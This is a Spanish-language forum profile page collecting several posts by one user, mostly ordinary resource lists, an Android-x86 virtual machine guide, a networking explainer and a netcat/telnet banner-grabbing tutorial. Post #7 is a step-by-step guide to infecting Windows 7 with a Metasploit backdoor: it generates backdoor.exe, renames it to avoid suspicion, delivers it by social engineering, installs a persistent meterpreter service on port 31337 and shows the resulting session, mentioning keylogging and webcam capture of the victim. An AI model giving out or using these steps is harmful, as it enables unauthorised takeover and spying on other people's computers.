Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - arm972

#1
Hola a todos,hoy les traigo una serie de paginas webs excelentes a mi parecer en dos secciones ,webs o proyecto online que nos permiten probar nuestras técnicas apropiadas por nosotros y unirnos a equipos para competir ,en conclusión para aprender mas saberes, donde ponen desafíos sobre criptografia,esteganografia,protocolos de red ,complemento a urls ,practicas de programación segura ,pensamiento logico (abstracción) ,en si estas webs tiene la posibilidad para adquirir nosotros de fortalecer lo que con referente a nuestro conocimiento nos hemos apropiado,aquí van los links :


Capture the flag.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Enigma group Desafios:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Hacking lab :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vulnhub Lista recursos general (programación,técnicas,metodologías).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Aquí vienen los recursos para aprender,mejorar nuestras practicas de desarrollo con respecto a cualquier tecnología.

Hakipedia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desarrollo de sofware (tecnologías en general).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Recursos para lenguajes web :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Buscador de links (contenido personalizado y preseleccionado)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Recursos para desarrollo de sofware (tecnologías en general :escritorio y web):

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Recursos web (protocolos de red tcp,http,ftp,ssh etc etc)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Recursos practicas para programación segura y enfoque de lenguajes de programación hacia el pentesting:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



PLATAFORMA VIRTUAL DELL TRAINING (Cursos ofertados de manera gratuita  por dell con su respectivo certificado).

Excelente plataforma brinda cursos sobre virtualización ,seguridad en sistemas,administración de sistemas y todas las temáticas impartidas o como tal reconocidas en el ámbito de la tecnologías de la información,es de uso gratuito y omite al terminar cada cursos su respectivo certificado valido para agregarlo a nuestra hoja de vida.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Espero les haya gustado y les sirva.
#2

Hola a todos ,hoy les traigo un tutorial explicando como es posible instalar el sistema operativo android x.x (cualquier versión) pero con una gran diferencia a un dispositivo movil que no es posible la utilización y el manifiesto como tal de los sensores del mismo dispositivo como el acelerometro ,inclinometro,giroscopio,ya entrando en materia vamos a continuar:

Algo de historia sobre android (segun wikipedia):

Android es un sistema operativo basado en el kernel de Linux diseñado principalmente para dispositivos móviles con pantalla táctil, como teléfonos inteligentes o tabletas, inicialmente desarrollado por Android, Inc. Google respaldó económicamente y más tarde compró esta empresa en 2005.9 Android fue presentado en 2007 junto la fundación del Open Handset Alliance: un consorcio de compañías de hardware, software y telecomunicaciones para avanzar en los estándares abiertos de los dispositivos móviles.10 El primer móvil con el sistema operativo Android fue el HTC Dream y se vendió en octubre de 2008.

Fue desarrollado inicialmente por Android Inc., una firma comprada por Google en 2005.12 Es el principal producto de la Open Handset Alliance, un conglomerado de fabricantes y desarrolladores de hardware, software y operadores de servicio.10 Las unidades vendidas de teléfonos inteligentes con Android se ubican en el primer puesto en los Estados Unidos, en el segundo y tercer trimestres de 2010,13 14 15 con una cuota de mercado de 43,6% en el tercer trimestre.16 A escala mundial alcanzó una cuota de mercado del 50,9% durante el cuarto trimestre de 2011, más del doble que el segundo sistema operativo (iOS de Apple, Inc.)

Tiene una gran comunidad de desarrolladores escribiendo aplicaciones para extender la funcionalidad de los dispositivos. A la fecha, se ha llegado ya al 1.000.000 de aplicaciones (de las cuales, dos tercios son gratuitas y en comparación con la App Store más baratas) disponibles para la tienda de aplicaciones oficial de Android: Google Play, sin tener en cuenta aplicaciones de otras tiendas no oficiales para Android como la tienda de aplicaciones Samsung Apps de Samsung, slideme de java y amazon appstore.17 18 Google Play es la tienda de aplicaciones en línea administrada por Google, aunque existe la posibilidad de obtener software externamente. La tienda F-Droid es completamente de código abierto así como sus aplicaciones, una alternativa al software privativo. Los programas están escritos en el lenguaje de programación Java.19 No obstante, no es un sistema operativo libre de malware, aunque la mayoría de ello es descargado de sitios de terceros.20

El anuncio del sistema Android se realizó el 5 de noviembre de 2007 junto con la creación de la Open Handset Alliance, un consorcio de 78 compañías de hardware, software y telecomunicaciones dedicadas al desarrollo de estándares abiertos para dispositivos móviles.21 22 Google liberó la mayoría del código de Android bajo la licencia Apache, una licencia libre y de código abierto.23

La estructura del sistema operativo Android se compone de aplicaciones que se ejecutan en un framework Java de aplicaciones orientadas a objetos sobre el núcleo de las bibliotecas de Java en una máquina virtual Dalvik con compilación en tiempo de ejecución. Las bibliotecas escritas en lenguaje C incluyen un administrador de interfaz gráfica (surface manager), un framework OpenCore, una base de datos relacional SQLite, una Interfaz de programación de API gráfica OpenGL ES 2.0 3D, un motor de renderizado WebKit, un motor gráfico SGL, SSL y una biblioteca estándar de C Bionic. El sistema operativo está compuesto por 12 millones de líneas de código, incluyendo 3 millones de líneas de XML, 2,8 millones de líneas de lenguaje C, 2,1 millones de líneas de Java y 1,75 millones de líneas de C++.

Mas info :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

lo que necesitamos:

-Sistema de virtualización ,sistema el cual permite crear maquinas virtuales en un sistema operativo subyacente.
(maquina virtual )
-Imagen iso de el sistema operativo android x.x .

Desde la web official de android.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-Antena wifi (opcional ) este hardware permite que mediante el s.o android agregarla como una interfaz de red para un dispositivo movil  como si estuviéramos manipulándola en una tablet o x dispositivo móvil para podernos conectar a una red wifi.

Vamos a proceder a instalar el sistema operativo.

1.creamos una maquina virtual en nuestro sistema de virtualización para cargar un sistema operativo linux ,cualquiera.



2.creamos disco duro virtual semejante a 64gb o algo parecido a un dispositivo movil.




3.Cargamos la imagen del sistema operativo android .iso etc que descargamos de la web ,para que butee  en nuestra maquina virtual.







4.Ya iniciada nuestra maquina virtual aparece una pantalla en la cual le damos en la ultima opción install android-x86 to harddisk.



5.Creamos las particiones para almacenar el sistema operativo y los datos personales .Damos enter en create/modify partitions ,nos movemos con las fecha de dirección derecha e izquierda y vamos a la opción new le damos en primary (unidad primaria ) partición para el sistema operativo y accionamos el tamaño de la misma en MegaBytes.












6.Le damos en quit ,ya echo esto aparecera una pantalla azul con las particiones creadas selecionamos la primaria en la cual se va a instalar el sistema operativo le damos en ok.





7. Selecionamos sistema de archivos de esta partición . las siguientes opciones todas damos en yes.








8. Esperamos hasta que la barra de progreso de instalar el sistema operativo se complete al 100%.



9.Le damos en reboot y enter.




10.Ya después del reinicio de nuestra maquina virtual vuelve a aparecer la misma pantalla de instalación cuando apenas ivamos a iniciar el proceso y seleccionamos  la primera opción ,Run Android -x86 without installation ,despues echo esto esperamos que cargue el sistema operativo .


12.seleccionamos el idioma de nuestro android.Aqui cabe resaltar que se aplica si se tiene una antena de wifi con adaptador usb por la sencilla razón que se debe tener un conector hembra usb para poder introducir el conector macho de nuestro antena wifi y poder tener acceso a internet .





13.estas configuraciones que vienen a continuación si es de gusto de cada usuario segun le convengan , y ya tenemos instado nuestro sistema operativo android. y podremos utilizar esta maquina virtual como dispositivo de pentesting o el uso que tu le quieras dar .














Espero les haya gustado,dejen sus comentarios,dudas ,preguntas

Cabe aclara que este proceso sirve de igual manera para una computadora de escritorio física teniendo los requerimientos iniciales.










#3
Hola a todos,hoy les traigo uno de los procesos iniciales que se deben llevar acabo en una prueba de penetración de caja negra (blackbox) el cual se basa en que con ciertos métodos o técnicas  para la obtención de información de los banners(versiones de los servicios de un servidor web en concreto ) o maquina semejante a esta, o servicios que nos esta ofreciendo la aplicación o pagina web que vamos a realizar el proceso de prueba de intrusión.

Este tuto va enfocado a que después de acceder a un sistema hay un cierto porcentaje en que la posibilidad de utilización de herramientas muy conocidas en este campo como nmap,metasploit etc etc para no extendernos pero cuando ya se tiene acceso a un sistema muchas veces no poseemos la capacidad de utilizar estas herramientas dentro de el sistema afectado por lo cual hay la necesidad de utilizar herramientas que estén al alcanze de nuestras manos.

Lo primero que vamos a proceder a hacer es la manipulación de nuestra famosa herramienta netcat ,como muchos saben esta herramienta en linea de comandos multiplataforma permite que un usuario x cree una conexión a la escucha para que otro host y se pueda conectar a ella y así "hablar" estos host por así decirlo "comunicarnos" ,netcat se puede utilizar tanto un servidor como cliente ,el servisor implica ser el crear de esta conexión y el cliente el que se conecta a ella.

Como primer practica vamos a crear una conexión con nuestro amiguito netcat y decirle que quede en essucha hasta que alguien se conecte a esta conexión que dejamos a la escucha ,para esto hacemos lo siguiente:


Ya con esto dejamos una conexión en un puerto especifico en el host x para posteriormente un host y se conecte al host x asi puedan hablar "comunicarse" .

-l: con este parámetro le decimos a netcat que cree  una conexión de manera silenciosa
-p: con este parámetro le señalamos a netcat que deseamos usar un puerto en especifico. pueden usar cualquiera pero aquí hago un paréntesis con referente a los puertos de una computadora .

este fragmento siguiente fue obtenido de :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

1. Los puertos comprendidos entre el 0 y el 1023 son puertos reservados para usos específicos que se encuentran reglamentados, el sistema operativo los abre para permitir su empleo por diversas aplicaciones mediante los llamados protocolos "Bien conocidos", por ejemplo: HTTP, FTP, TELNET, IRC, POP3, etc.

2. Los comprendidos entre 1024 y 49151 son denominados "Registrados" y pueden ser usados por cualquier aplicación.

3. Los comprendidos entre los números 49152 y 65535 son denominados "Dinámicos o privados", son los usados por el sistema operativo cuando una aplicación tiene que conectarse a un servidor y le realiza la solicitud de un puerto.

Si desean ampliar mas información acerca de los puertos de una computador en el link anterior  podrán encontrar abundante información.

-permite a netcat activar como una especie de cuadro de diálogo en el cual me va a permitir el proceso de la creación´n de esta conexión con netcat y el usuario y si se llegara a conectar a esta conexión y todo la comunicación que estos llevan.

Ahora vamos a pasar a otro plano ponernos en los zapatos de el usuario y el cual se conectara a la conexión anteriormente creada
Lo que vamos a hacer es conectarnos ,ponernos a hablar por medio de el canal de comunicación que el usuario x creo y dejo abierto por medio de netcat utilizando el puerto x.


ip(xxx.xxx.xxx.xxx):direción ip de el usuario x para poderse conectar a el canal abierto de este.
puerto(1299):el puerto del usuario x .

"hola amigo" este el mensaje que le mandaremos a nuestro amigo x   o cualquier cosa que se nos ocurra y vamos a ver que efectivamente el usuario x recibe nuestro mensaje ,a continuación verán una conversación entera entre el host x y el host y ,están "hablando" comunicándose .para acabar con este pequeña explicación el usuario y hacer de emisor por que es el que emite el mensaje a el usuario x y ambiguamente el usuario x hace de receptor por que es el cual recibe el mensaje de el host y.

Si alguien no entiende el funcionamiento de este proceso aqui dejo un tuto que hize basado en un sistema de comunicación aplicado a la vida real.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora vamos a instalar un servidor web en nuestra maquina local kali linux este sistema es basado en ubuntu que por defecto viene el servidor web apache pero no inicializado como tal el servicio de este .

aqui van las instrucciones para instalar el apache desde los respectivos   repositorios de kali liux.

escribimos lo siguiente:


en la ultima parte utilizamos netcat conectándonos al puerto 80 de nuestro ordenador "maquina local" para saber si esta abierto o no ,de estar abierto el puerto 80 da señal de algún servicio esta corriendo en ese puerto. Efectivamente nos muestra 80 open,cabe aclara que este método de conexión con netcat para saber si un puerto de nuestro ordenador esta abierto o no  sirve para cualquier puerto ,ninguno en especial.

Aquí unos ejemplos ,es muy importante aclara que muchas veces por ejemplo en los servidores apache mal configuradas sus banners podemos con solo conectarnos con el netcat el puerto 80,la repuesta de el servidor va a hacer mostrarnos información relativa a la versión de el servidor web apache y el sistema operativo en el cual corre.


-w(x):x segundos de timetout si el host esta caído o alguna novedad  por el estilo.


Cuando iniciemos la conexión con netcat debemos introducir una query la cual nos va a permitir conocer la cabecera de repuesta de este servicio la cual es ,en materia con relación al protocolo http protocolo de transporte de hypertexto.

HEAD / HTTP /1.0

ip(xxx.xxx.xxx.xxx) : dirección ip de el host.
(80):puerto para saber si esta abierto o no.

Otra herramienta que permite inyectar trafico en determinado puerto según requiera el atacante , telnet la  sintaxis es muy sencilla

telnet ip puerto

donde:
ip :dirección ip del servidor o host.
puerto:puerto determinado para averiguar que servicio corre en el mismo.

en windows para utilizarlo deben tener activada la catacteriztica del sistema operativo ,el cliente telnet lógicamente :


un ejemplo claro con telnet para averiguar versión en especifico de un servidor web cualquiera.



Otra manera de averiguar la versión en especifico de un servidor web es introducir paginas no existentes en la barra de url del navegador el cual devolverá si las paginas de error 404 de respuesta del servidor no estan debidamente configuradas habrá una fuga de información muy importante la cual me va a permitir conocer la versión del servidor web el sistema operativo en el cual corre ,aquí un ejemplo :


Como ultimas formas de averiguar información de un determinado servidor web es utilizar servicios web los cuales no va a hacer mucho "ruido" no van a dejar logs en el servidor web si lo hace nuestro amiguito netcat ,y el cliente de telnet ,para esto vamos a utilizar google para darnos una idea de el tipo de tecnología utilizada en el sitio web y apartir de esto ir haciendo un bosquejo nos vamos a  enfrentar:

el verbo site de google nos permite visualizar información relativa a un dominio en especifico  mas el verbo ext que me permite encontrar ciertos documentos con ciertas extensiones como documentos office ,openoffice,pdf etc .

la sintaxis a utilizar es la siguiente:

site:sitiowebejemplo.com
ext:php

con el verbo ext vamos a entrar en materia vamos  a buscar archivo con extensiones como asp,php,jsp  apartir de los resultados vamos a darnos una noción de que tecnologia esta utilizand el sitio web:


y un ultimo recursos que voy a exponer en este tuto es un servicio web netcraft el cual nos permite dar una idea del lenguaje en que esta escrito un sitio web  ,actualizaciones que ha tenido el sitio etc en especifico .


espero les haya servido estos tips para nuestro proceso de pentest.

Dejen sus comentarios,dudas,preguntas :)
#4
Seguridad / Pagina web dedicada a el bug heartbleed
Mayo 11, 2014, 09:24:50 PM
Hola a todos, hoy les traigo una web para los que no la conocen esta web esta exclusivamente dedicada a la explicación del bug  que radica en el protocolo ssl de tal manera en más aplicación de este protocolo esta en si en la api que permite o abre las posibilidades de  encriptación de datos de forma para la transmisiòn de los mismos de forma segura  que se denomina openssl tal bug tan conocido como "heartbleed " en esta web te explican en que radica este bug ,sus referencias ,posibles soluciones del mismo ,sistemas operativos con posibles patrones de influencia del mismo si es verdad o no y las entidades influyentes en cuanto al desarrollo y normatividad del desarrollo del protocolo openssl ,cuales han sido sus pequeñas "muescas" de la repercusión de ya tan conocido fallo,referencias a documentos con mayor información de este bug.


Link del sitio:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero les haya gustando este pequeñito aporte,espero les sirva .

Dejen sus comentarios,dudas,preguntas,aportes .........

#5
Hola a a todos , hoy vengo a explicar el concepto de red,nodo ,modelos de transmisión emisor y receptor,espero les guste.


Una persona x que se encuentra en Colombia o cualquier país x quiere comunicarse con una persona y ,para comunicarse con ella poder hablar y dar algunas pautas e información de muy alta prioridad que manejan en la empresa  la persona y  se encuentran en Europa ,la persona x hace una llamada telefónica a larga distancia(cabe aclara que la persona y se encuentra en otro continente muy muy lejos por lo cual no es posible la comunicación en persona ) para eso la persona x se vale de las posibilidades tecnológicas ,la persona x primero se va a comunicar vía telefónica ,bueno hace la llamada a larga distancia quedando en claro que la persona x posterior a esta comunicación le enviara unos archivos muy importantes y confluye la comunicación vía "telefónica" ,la persona x también tiene que entregar unos documentos muy valiosos y de muy alta prioridad  la persona x va a utilizar la herramienta tecnológica como es el correo electrónico .la persona x elabora el mensaje con los documentos adjuntos y bueno todo lo que se deba enviar  ,ya elaborado el mensajes ,la persona x envía el mensaje y la persona y recibe la información acordada por la llamada telefónica con la persona ,en la llamada telefónica se encuentra un elementos muy importante que es el lenguaje con el cual se comunicación es algo estándar entre la persona x y persona y por el cual ellos transcurren el proceso de la comunicación y se entienden entre ellos lo que quieren decir " un código estándar". En estos dos casos tenemos una conexión utilizando las herramientas tecnológicas a nuestro alcance. Lo importante aquí resaltar es que la persona x es en este caso el remitente ,el constructor de la información  en otras palabras es el emisor del mensaje o información ,tanto la persona y posee una perspectiva en cuanto a que es el encargo de consumir esa información ,de dar uso en otras palabras es el receptor de la información o mensaje ,todos estos procesos se llevan a cabo porque el ambiente o medio en el cual se realizan lo permite en otras palabras por donde viajan las ondas sonoras de la llamada telefónica a larga distancia  y el correo electrónico es atreves de Internet y es manejado por ondas ,estos igual manejados por agentes externos que son los satélites y todos los medios de transmisión del servicio, cabe aclarar que aquí también  :-* o interviene el actor del lenguaje estándar del mensaje de correo electrónico el cual tiene la misma perspectiva con respecto a la llamada telefónica para su optima transcurrencia del mismo. Todos estos elementos confluyentemente se les denomina "medios de comunicación" "canal de comunicación".
Ya como tal tenemos 5 actores como tal en esta comunicación que son:
Persona x :emisor
Persona y: receptor:
Ondas telefónicas, aire, proveedor de servicios de Internet: medio que me permite realizar las comunicaciones "canal". Entre los medios utilizados están el ordenador de por lógica el cual son acceso Internet y con una serie de protocolos internos me permite mandar un mensaje de manera global. El teléfono usado para realizar la llamada.


Continuando con la comunicación en sí ,a  la persona x se le olvido un dato importante y justamente hoy viaja un allegado de la persona x para el lugar el recinto de donde se encuentra la persona y ,la persona x pide el favor a la persona z su allegado que le haga llegar en un pendrive o disco magnético etc. la valiosa información , la persona z llega donde la persona y le entrega la información  cabe aclara que la persona z se convierte en un intermediario por el cual es posible realizar la comunicación por la sencilla razón de que la persona z es el que se encarga de transmitir la comunicación o mensaje final como tal ,aquí no hay nada que explicar por qué esta todo claro es un claro ejemplo de la  situación anterior solo que se integra una persona z a nuestra comunicación. La siguientes situación se basa en que la persona z  y la persona y se necesitan comunicar con 5 personas al mismo tiempo el motivo por el cual se necesitan comunicar el mandar un código de acceso de un sistema informático de la empresa ,lo cual va a utilizar como canal el Internet van a mandar un archivo con el código de acceso pero utilización metodologías de cifrado y algunos servicios de Internet que permiten realizar una comunicación un poco más segura que un protocolo normal de comunicación .Aquí la persona z va a ser el agente físico que va a hacer llegar la información "el archivo"  a las 5 personas  al mismo tiempo  se las va a decir en una reunión el código de acceso y dar una copia en algún dispositivo magnético de archivo del código de acceso.

La personas se reúne con las personas y entrega el material hacen con satisfacción la reunión entregan el código .como explicación final cabe aclara que tanto los emisores como receptores de mensajes en general no están exentos de volverse o ser de tal manera lo contrario si por ejemplo la persona y es un emisor él también tiene la posibilidad de ser un receptor esto lo hacen convertir o denominar "un nodo" el cual es un puto en la red en el cual confluyen varias conexiones o comunicaciones .otra parte a aclarar es la acción de enviar un mensaje a un número N de personas el mismo tiempo se denomina broadcasting , que está especificado en la última situación de mi enunciado.

cabe resaltar que un host es todo elemento conectado a la red y cabe la aclaración de que muchas personas suelen decir que solo una computadora en términos generalmente hablado es un host ,y es algo errado en el sentido de que un host es cualquier dispositivo conectado a una red como un dispositivo móvil etc ,es cualquier dispositivo con la posibilidad de conectarse a la red .
Un nodo es un punto donde confluyen varios puntos de conexión , y en conclusión una red es un conjunto de nodos interconectados entre si que comparten información.
#6
Hacking / Google hacking Data Base (GHDB)
Mayo 01, 2014, 04:11:29 PM
Hola a todos .

El Google hacking Data Base es un gran repositorio donde se encuentran todas las dorks habidas y por aver de tipos de búsqueda con google en este sentido usando verbos se puede refinar nuestra búsqueda y poder obtener mucha información relativamente interesante,que no se puede obtener buscando relativamente como muchos buscan en google sin estos "verbos".

La web la cual contiene todo este tipo de dorks de como hallar documentos ocultos de los servidores,tipos de archivos vulnerabilidades de nivel web,cámaras ip ,impresoras,subdominios,acceso a servidores ftp ,archivos rdp etc etc ,a base de una sintaxis que llevan estos verbos por así decirlo plantillas de las dorks construidas y recolectas en este repositorio el GHDB ,y en base a estas construir nuestras propias dorks .

Link del repositorio:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Espero les haya gustado  dejen sus dudas,comentarios,complementos ,gracias a todos :).



Nota de moderador: No se permite ningún tipo de enlace ajeno al foro, y menos para promocionar un sitio web personal.

Lee las reglas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Atte, LucaSthefano
#7
Hola a todos ,aquí les traigo un tutorial de como infectar windows 7 sp1 por medio de la generación de un payload por el modulo msfpayload de metasploit ,generaremos este payload para poder que la victima reciba el archivo lo ejecute y asi poder obtener una shell meterpreter  8)  y tener control total sobre esta maquina .

aquí van los pasos a seguir :

1.Generamos el payload con el modulo msfpayload de metasploit ,este payload seria la backdoor para tener control sobre la victima una vez haya recibido nuestra backdoor ,para esto ingresamos a nuestra terminal y escribimos :

Link de la imagen de el procedimiento:



donde:

LHOST=tu ip local.
LPORT=puerto de escucha del payload "backdoor" pueden usar cualquier puerto a su gusto.
x >/root/backdoor.exe  este parámetro es para especificar donde vamos a generar el archivo de nuestro payload "backdoor".

2.Ingresamos a nuestra consola de metasploit para ya entrar en efectividad del payload generado por medio de un exploit para esto hacemos lo siguiente:

donde vamos a decirle a metasploit que vamos a usar cierto exploit y sus respectivos parámetros .

vamos a usar un exploit multi-cabecera.

link de la imagen del procedimiento:



use exploit/multi/handler ="aqui estamos diciendo a metasploit que vamos a usar este exploit"

set payload windows/meterpreter="aquí estamos defiendo el payload para nuestro exploit "backdoor".

set lhost=tu dirección ip local

set lport=puerto de escucha.

run para dar como tal ya ejecución a nuestro exploit:

ya como tal se van a la carpeta en este caso root donde van a poder encontrar el archivo backdoor.exe , para no levantar muchas sospechas lo nombramos de otra manera por logica ,bueno ya si todo va bien ,tendremos que por medio de nuestras técnicas de ingeniera social hacer llegar nuestro backdoor a la victima  y poder tener acceso a nuestra sesión de meterpreter.

3.procedemos a ejecutar un servicio de acceso y control  para inyectárselo a nuestra victima para así tenerla controlada de forma remota ,hacemos lo siguiente:

meterpreter > run metsvc
  • Creating a meterpreter service on port 31337
  • Creating a temporary installation directory C:\DesktopxD ;) ........................
  •   >> Uploading metsrv.dll...
  •   >> Uploading metsvc-server.exe...
  •   >> Uploading metsvc.exe...
  • Starting the service...
  •       * Installing service metsvc
    * Starting service
    Service metsvc successfully installed.

    meterpreter >


    4.Nuestra backdoor ya se esta ejecutando como tal en el equipo victima en el puerto  31337 y vamos a declara y definir que vamos a esta maquina  escucharlo por el puerto 31337 y hacemos lo siguiente en nuestra consola de meterpreter:

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
    PAYLOAD => windows/metsvc_bind_tcp
    msf exploit(handler) > set LPORT 31337
    LPORT => 31337
    msf exploit(handler) > set RHOST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    RHOST => No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    msf exploit(handler) > exploit

  • Starting the payload handler...
  • Started bind handler
  • Meterpreter session 2 opened (xxx.xxx.xxx.xxx:31337 -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:31337)

    meterpreter >

    donde:
    set PAYLOAD windows/metsvc_bind_tcp

    Aquí estamos definiendo que este escuchando al equipo atacado de manera silenciosa.

    set LPORT:

    puerto de escucha de el equipo victima.

    set RHOST:

    Dirección ip del equipo atacado.

    ya teniendo control de una sesión meterpreter como tal podemos hacer lo que se nos ocurra como tomar las pulsaciones de el teclado,tomar fotos de la web cam etc etc  ;D .

    Aquí termina este pequeño tutorial ,todo es con fines educativos de conocimiento de técnicas .

    Dejen sus comentarios,complementos,dudas ,gracias a todos :)



    Nota de moderador: No se permite ningún tipo de enlace ajeno al foro, y menos para promocionar un sitio web personal.

    Lee las reglas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Atte, LucaSthefano
#8
Hola a todos, mi primer post va a ser lo relacionado con capacitación online gratuita , algunos portales de ciertas empresas ofrecen capacitación online con muy buena información y certificado muchas veces valido para la latinoamerica ,se podría decir que para todo el mundo ,estos cursos también "sirven" para agregarlos a nuestro curriculum vitae ,aprender algo nuevo no cae mal no y más a un si se da un certificado valido .

Aquí van los portales con una descripción muy breve de cada uno de ellos.


1. Plataforma Intel diálogo Ti.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta plataforma educativa es de libre uso obviamente como el nombre lo dice es proporcionada por intel  ,posee información tanto documentos,vídeos,cursos  la temática que tratan es sobre redes,seguridad informática etc .Los cursos generan su respectivo certificadoal finalizar cada curso y realizar su respectivo test.


2. Plataforma microsoft Virtual Academy.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta plataforma educativa es de libre uso también ,como su nombre lo indica es brindada por microsoft,posee información se podría decir que relativamente buena pero enfoca a todas las pilas de infraestructura ofrecidas por microsoft ,como virtualización cursos sobre system center 2012 ,app controller etc etc ,seguridad de la información  ,programación en c# ,c++ , sql ,html5 ,css3 ,javascript ,desarrollo de vídeo juegos,desarrollo de apps ,fundamentos de programación orientada  a objetos etc .Esta plataforma también genera sus respectivos certificados al terminar el curso a tomar.

3.certificación básica Dlink.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

esta capacitación es de libre uso , la temática de esta capacitación trata todo lo relacionado con la historia de las redes , tipo logias de redes ,productos Dlink y sus respectivas característica tienes plazo de 12 días para leer el material de la certificación ,el certificado generado tiene validez para toda la platinoamerica por 2 años .


va para todas las plataformas ,solo se registran con un correo valido ,contraseña ,país donde residen datos básicos no más piden etc ....

Espero les aya gustado este pequeño aporte dejen comentarios,dudas,complementaciones de plataformas que conozcan ,gracias a todos :)

#9
Presentaciones y cumpleaños / Presentación Arm972
Mayo 01, 2014, 10:26:19 AM
Hola a todos  ;D , soy nuevo en el foro tengo 17 años me dedica a investigar sobre todo esto de programación redes, seguridad etc. Entre al foro por los talleres y me pareció excelente y por lo cual estoy acá ,muy buena información excelente diría yo sin palabras, también entre por que necesito ayuda en ciertos interrogantes sobre algoritmos etc.Todos estos temas que necesito :),que no tengo la oportunidad de discutir con alguien sobre esto . gracias a todos :)